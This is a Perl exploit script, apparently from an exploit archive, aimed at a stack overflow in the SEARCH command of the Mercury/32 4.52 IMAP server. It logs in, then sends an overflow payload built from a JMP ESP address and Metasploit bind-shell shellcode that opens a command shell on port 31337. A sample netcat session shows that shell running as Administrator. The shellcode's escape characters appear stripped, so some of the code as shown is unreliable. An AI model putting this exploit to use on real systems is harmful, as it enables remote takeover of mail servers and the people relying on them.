Mercury/32 4.52 IMAPD SEARCH command Post-Auth Overflow Exploit

# Z:Exp>mercury_SEARCH.pl 127.0.0.1 143 void ph4nt0m.org # Mercury/32 v4.52 IMAPD SEARCH command Post-Auth Stack Overflow Exploit # Found & Code by void# ph4nt0m.org # # S: * OK mercury.ph4nt0m.org IMAP4rev1 Mercury/32 v4.52 server ready. # C: pst06 LOGIN void ph4nt0m.org # S: pst06 OK LOGIN completed. # C: pst06 SELECT INBOX # S: * 0 EXISTS # S: * 0 RECENT # S: * FLAGS (Deleted Draft Seen Answered) # S: * OK [UIDVALIDITY 1190225819] UID Validity # S: * OK [UIDNEXT 1] Predicted next UID # S: * OK [PERMANENTFLAGS (Deleted Draft Seen Answered)] Settable message flag # s # S: pst06 OK [READ-WRITE] SELECT completed. # [*] Send Evil Payload ... # [+] Done! Check out cmdshell@127.0.0.1:31337. Good Luck :-P # # Z:Exp>nc -vv 127.0.0.1 31337 # DNS fwd/rev mismatch: localhost != GNU # localhost [127.0.0.1] 31337 (?) open # Microsoft Windows XP [掳忙卤戮 5.1.2600] # (C) 掳忙脠篓脣霉脫脨 1985-2001 Microsoft Corp. # # e:MERCURY>whoami # whoami # Administrator # # e:MERCURY> use strict; use warnings; use IO::Socket; # Target IP my $imap_host = shift || 127.0.0.1; my $imap_port = shift || 143; my $imap_user = shift || "void"; my $imap_pass = shift || "ph4nt0m.org"; my $banner = " Mercury/32 v4.52 IMAPD SEARCH command Post-Auth Stack Overflow Exploit ". " Found & Code by void#ph4nt0m.org ". " "; my $cheers = "Celebrate_the_6th_anniversary_of_the_founding_of_Ph4nt0m.org"; my $jmpesp = "x12x45xfax7f"; # Windows 2000/xp/2003 CHS Universe # /* win32_bind - EXITFUNC=thread LPORT=31337 Size=347 Encoder=Pex http://metasploit.com */ # bad char: 0x00 0x0A 0x0D 0x20 0x29 my $shellcode = "x31xc9x81xe9xb0xffxffxffxe8xffxffxffxffxc0x5ex81". "x76x0exfaxd1xa5x6fx83xeexfcxe2xf4x06xbbx4ex22x12". "x28x5ax90x05xb1x2ex03xdexf5x2ex2axc6x5axd9x6ax82". "xd0x4axe4xb5xc9x2ex30xdaxd0x4ex26x71xe5x2ex6ex14". "xe0x65xf6x56x55x65x1bxfdx10x6fx62xfbx13x4ex9bxc1". "x85x81x47x8fx34x2ex30xdexd0x4ex09x71xddxeexe4xa5". "xcdxa4x84xf9xfdx2exe6x96xf5xb9x0ex39xe0x7ex0bx71". "x92x95xe4xbaxddx2ex1fxe6x7cx2ex2fxf2x8fxcdxe1xb4". "xdfx49x3fx05x07xc3x3cx9cxb9x96x5dx92xa6xd6x5dxa5". "x85x5axbfx92x1ax48x93xc1x81x5axb9xa5x58x40x09x7b". "x3cxadx6dxafxbbxa7x90x2axb9x7cx66x0fx7cxf2x90x2c". "x82xf6x3cxa9x82xe6x3cxb9x82x5axbfx9cxb9xdfx06x9c". "x82x2cx8ex6fxb9x01x75x8ax16xf2x90x2cxbbxb5x3exaf". "x2ex75x07x5ex7cx8bx86xadx2ex73x3cxafx2ex75x07x1f". "x98x23x26xadx2ex73x3fxaex85xf0x90x2ax42xcdx88x83". "x17xdcx38x05x07xf0x90x2axb7xcfx0bx9cxb9xc6x02x73". "x34xcfx3fxa3xf8x69xe6x1dxbbxe1xe6x18xe0x65x9cx50". "x2fxe7x42x04x93x89xfcx77xabx9dxc4x51x7axcdx1dx04". "x62xb3x90x8fx95x5axb9xa1x86xf7x3exabx80xcfx6exab". "x80xf0x3ex05x01xcdxc2x23xd4x6bx3cx05x07xcfx90x05". "xe6x5axbfx71x86x59xecx3exb5x5axb9xa8x2ex75x07x15". "x1fx45x0fxa9x2ex73x90x2axd1xa5x6f"; print $banner; sleep(1); my $sock = IO::Socket::INET->new( PeerHost=>$imap_host, PeerPort=>$imap_port, proto=>"tcp" ) or die "Connect error. "; imap_recv(""); imap_send("pst06 LOGIN $imap_user $imap_pass ", "rv"); imap_send("pst06 SELECT INBOX ", "rv"); my $payload = $cheers.$jmpesp.$shellcode; print "[*] Send Evil Payload ... "; imap_send("pst06 SEARCH ON $payload ", ""); sleep(1); print "[+] Done! Check out cmdshell@$imap_host:31337. Good Luck :-P "; $sock->close(); sub imap_send { if($_[1] =~ /v/) { if(length($_[0])<=75) { print "C: ".$_[0]; } else { print "C: ".substr($_[0], 0, 36)." ... ".substr($_[0], -36, -1)." "; } } print $sock $_[0]; if($_[1] =~ /r/) { imap_recv(substr($_[0], 0, index($_[0], " ")+1)); } } sub imap_recv { while(<$sock>) { print "S: ".$_; if($_ =~ /$_[0]OK/) { last; } elsif($_ =~ /$_[0]NO|$_[0]BAD/ ) { last; } else { next; } } } # sebug.net